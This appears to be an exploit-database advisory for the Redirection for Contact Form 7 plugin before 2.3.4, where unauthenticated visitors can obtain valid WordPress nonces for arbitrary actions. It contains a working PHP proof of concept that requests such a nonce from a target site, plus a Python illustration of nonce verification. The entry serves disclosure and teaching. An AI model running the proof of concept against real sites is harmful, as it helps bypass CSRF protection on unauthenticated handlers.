wpexploit | Chloe Chamberland | WPEX-ID: 99F30604-D62B-4E30-AFCD-B482F8D66413
History: Apr 20, 2021 - 12:00 a.m.

Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation

Published: 2021-04-20 00:00:00
Author: Chloe Chamberland
Tags: php, curl, nonce, unauthenticated, exploit, wordpress, form security, ajax, redirection

EPSS: 0.109 (percentile 95.2%)

In versions of the plugin before 2.3.4, unauthenticated users can call the wpcf7r_get_nonce AJAX action through wp-admin/admin-ajax.php and pass any action name in the param field; the handler returns a valid nonce for that action. A WordPress nonce binds the action name, the requesting user ID and the session token to a 12-hour time window, so a nonce minted this way by a logged-out visitor (user ID 0, empty session token) is exactly what the server recomputes when it verifies a logged-out request for the same action. Any nopriv handler that relies on a nonce check as its only gate can therefore be driven by an unauthenticated attacker. Note the scope: a nonce is CSRF protection, not authentication, and the leaked nonce does not give the attacker a logged-in user's identity or capabilities.

<?php
// Proof of concept: ask the plugin's unauthenticated AJAX handler for a nonce.
// Usage: php poc.php https://target.example.com <wordpress_action_name>
if ($argc < 3) {
    fwrite(STDERR, "Usage: php {$argv[0]} <wp_url> <action>\n");
    exit(1);
}

// Settings
$wp_url    = rtrim($argv[1], '/');
$action    = $argv[2];            // any WordPress action/function name
$cookiejar = tempnam(sys_get_temp_dir(), 'wpcf7r'); // was undefined in the original PoC

// Get nonce (no WordPress cookies are sent, so the request is unauthenticated)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'action' => 'wpcf7r_get_nonce',   // the plugin's AJAX handler
    'param'  => $action,              // action the returned nonce should be valid for
]);

$output = curl_exec($ch);
if ($output === false) {
    fwrite(STDERR, 'curl error: ' . curl_error($ch) . "\n");
}
curl_close($ch);
unlink($cookiejar);
print_r($output);
?>
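To see why a nonce handed out to a logged-out caller is usable elsewhere, the following added example ports WordPress's wp_create_nonce() / wp_verify_nonce() algorithm (tick = ceil(time / (nonce_life / 2)); HMAC-MD5 over "tick|action|uid|token" with the nonce salt; 10 characters taken from the tail of the digest) to Python. This is illustration code written for this page, not the plugin's or WordPress's own source: the salt is constructed, the response format of wpcf7r_get_nonce is not reproduced, and the nonce the endpoint leaks is modelled simply as the nonce WordPress would create for user ID 0 with an empty session token. The "now" parameter exists only to make the time window explicit.

```python
import hashlib
import hmac
import math
import time

# Constructed secret standing in for wp_salt('nonce') (NONCE_KEY . NONCE_SALT).
NONCE_SALT = b"constructed-nonce-salt-for-demo-only"
NONCE_LIFE = 86400  # DAY_IN_SECONDS, the default value of the nonce_life filter


def wp_nonce_tick(now=None):
    """WordPress wp_nonce_tick(): ceil(time() / (nonce_life / 2)), so a new tick every 12 h."""
    now = time.time() if now is None else now
    return math.ceil(now / (NONCE_LIFE / 2))


def wp_hash(data, salt=NONCE_SALT):
    """WordPress wp_hash(): hash_hmac('md5', $data, wp_salt($scheme))."""
    return hmac.new(salt, data.encode(), hashlib.md5).hexdigest()


def _nonce_for_tick(tick, action, uid, token):
    # substr(wp_hash(...), -12, 10): start 12 chars from the end, take 10.
    return wp_hash(f"{tick}|{action}|{uid}|{token}")[-12:-2]


def wp_create_nonce(action, uid=0, token="", now=None):
    """Port of wp_create_nonce(). A logged-out visitor has uid 0 and an empty
    session token, so the nonce binds only the action name and the time window."""
    return _nonce_for_tick(wp_nonce_tick(now), action, uid, token)


def wp_verify_nonce(nonce, action, uid=0, token="", now=None):
    """Port of wp_verify_nonce(): 1 if minted in the current tick, 2 if in the
    previous tick (0-12 h older), False otherwise."""
    tick = wp_nonce_tick(now)
    if hmac.compare_digest(_nonce_for_tick(tick, action, uid, token), nonce):
        return 1
    if hmac.compare_digest(_nonce_for_tick(tick - 1, action, uid, token), nonce):
        return 2
    return False


def leaked_nonce(param, now=None):
    """Models what the vulnerable endpoint hands to an unauthenticated caller:
    the nonce WordPress creates for action `param` in a logged-out context."""
    return wp_create_nonce(param, uid=0, token="", now=now)


def nopriv_handler_accepts(nonce, action, now=None):
    """A hypothetical wp_ajax_nopriv_* handler whose only gate is the nonce check.
    Verification runs in the caller's (logged-out) context: uid 0, empty token."""
    return bool(wp_verify_nonce(nonce, action, uid=0, token="", now=now))


def logged_in_handler_accepts(nonce, action, uid, token, now=None):
    """Same check in a logged-in session: the leaked nonce does not match, because
    the nonce was bound to uid 0 and an empty token, not to this user's session."""
    return bool(wp_verify_nonce(nonce, action, uid=uid, token=token, now=now))


if __name__ == "__main__":
    t0 = 1_618_876_800  # 2021-04-20 00:00:00 UTC, the advisory date
    n = leaked_nonce("some_privileged_action", now=t0)
    print("nonce:", n)
    print("nopriv check, same action :", nopriv_handler_accepts(n, "some_privileged_action", now=t0))
    print("nopriv check, other action:", nopriv_handler_accepts(n, "other_action", now=t0))
    print("12 h later                :", wp_verify_nonce(n, "some_privileged_action", now=t0 + 43200))
    print("24 h later                :", wp_verify_nonce(n, "some_privileged_action", now=t0 + 86400))
    print("logged-in user 5          :", logged_in_handler_accepts(n, "some_privileged_action", 5, "sess", now=t0))
```

The run shows the shape of the issue: the leaked nonce verifies for the action it was requested for (and keeps verifying for up to 24 hours, returning 1 then 2), fails for any other action, and fails when the verifying request belongs to a logged-in session. In other words the bug removes the CSRF barrier from unauthenticated nonce-gated handlers; it does not by itself forge a user's session.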
